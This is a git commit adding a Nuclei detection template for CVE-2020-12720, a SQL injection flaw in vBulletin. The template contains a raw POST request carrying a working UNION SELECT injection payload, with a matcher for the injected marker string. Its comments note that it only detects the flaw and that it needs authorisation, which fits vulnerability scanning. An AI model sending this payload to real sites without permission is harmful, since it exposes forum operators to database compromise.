Added CVE-2020-12720 vBulletin SQLI
parent
7140d8c18a
commit
4a33940a37
|
@ -0,0 +1,30 @@
|
|||
id: CVE-2020-12720
|
||||
|
||||
info:
|
||||
name: CVE-2020-12720 vBulletin SQLI
|
||||
author: pdnuclei - projectdiscovery.io
|
||||
severity: critical
|
||||
|
||||
# Source https://github.com/rekter0/exploits/tree/master/CVE-2020-12720
|
||||
# This template supports the detection part only.
|
||||
# Do not test any website without permission
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /ajax/api/content_infraction/getIndexableContent HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: python-requests/2.23.0
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept: */*
|
||||
Connection: keep-alive
|
||||
X-Requested-With: XMLHttpRequest
|
||||
Content-Length: 179
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
nodeId%5Bnodeid%5D=1+UNION+SELECT+26%2C25%2C24%2C23%2C22%2C21%2C20%2C19%2C20%2C17%2C16%2C15%2C14%2C13%2C12%2C11%2C10%2C%22vbulletinrcepoc%22%2C8%2C7%2C6%2C5%2C4%2C3%2C2%2C1%3B--+-
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "vbulletinrcepoc"
|
Loading…
Reference in New Issue